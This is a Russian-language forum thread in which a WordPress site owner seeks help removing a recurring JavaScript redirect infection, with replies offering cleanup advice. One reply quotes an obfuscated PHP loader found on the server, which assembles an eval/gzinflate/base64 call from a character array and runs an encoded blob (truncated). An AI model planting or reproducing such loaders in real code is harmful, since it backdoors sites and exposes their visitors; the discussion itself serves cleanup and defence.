povstanez

Рейтинг
0
Регистрация
22.08.2013
hexacell:
povstanez, а какой хостинг у вас? не хостлайф случайно?

Да хостлайф

Rampage_FR:
в этой папке куча бяки

например
файл b245.php, c1a.php, class-image.php...
<?php

$ab = array("l",";",'z','t',"e",'f',"(",'4','s','o',"r",'$','6',"n",'b','_',"d",")","a","v",'c',"g","i");
$bb2 = create_function('$'.'v',$ab[4].$ab[19].$ab[18].$ab[0].$ab[6].$ab[21].$ab[2].$ab[22].$ab[13].$ab[5].$ab[0].$ab[18].$ab[3].$ab[4].$ab[6].$ab[14].$ab[18].$ab[8].$ab[4].$ab[12].$ab[7].$ab[15].$ab[16].$ab[4].$ab[20].$ab[9].$ab[16].$ab[4].$ab[6].$ab[11].$ab[19].$ab[17].$ab[17].$ab[17].$ab[1]);
$bb2('FJ3HjqPsFkUf57bEgJyG5JwxaXJFMDmDSU//U0NLVS7745y913Lb7u+R9v
...
');
?>

Удалил все ети фаилы с хостинга, но код в указаном месте появляетса снова и снова

Вот файлы с хостинга: http://yadi.sk/d/VqlBAiI68S8v6

Код появляется в файле - http://vitaliyivanov.com/wp-includes/js/jquery/jquery.js?ver=1.8.3

Все чаще и чаще...

Уже даже гугл начал блокировать...

все Яндекс проверил, с сайтом все в порядке, огромное спасибо всем за оказанную помощь!!!

BigS:
Была похожая проблема с одним клиентским сайтом. Через дыры и до нас залитые шеллы ставили свой вредоносный код. Схема была такая: при первой загрузке на клиентском компе подгружался javascipt При повторных загрузках его уже не было. Возможно поэтому вы ничего не находите при загрузке страниц сайта.

Поэтому почистите куки и кеш и загрузить свой сайт - посмотрите код страницы - скорее всего увидите посторонний javascript.

На хостинге посмотрите по дате свежеизменённые файлы и ищите в них что-нибудь типа encode64.

И обращайтесь к спецам - пусть запретят доступы к некоторыем папкам на хостинге, на исполнение и запись.




посмотрите, возможно у вас есть "лишние" файлы на сервере. Если остался шелл или дыры в CMC не закрыты, то будут продолжать внедрять свой код.

Проблема в том что я новичок, и меня нету возможности чтобы обратиться к профессионалам за помощью.

Поэтому приходится как-то выходить из ситуации...

Я пересмотрел все файлы на хостинге с расширением js и нигде больше не нашел кода с этим доменом. Но контакт продолжает блокировать ссылки на сайт (новые)

Огромное спасибо за помощь!

Я удалил код в указанном файле. Как теперь проверить удалился ли вирус?

а какой хоть примерно код искать?

Привет всем, помогите пожалуйста - содержит Troj/JSRedir-LR (по данным компании Sophos).

Сайт - www.VitaliyIvanov.com сайт на WordPress

какой код и в каком файле нужно искать?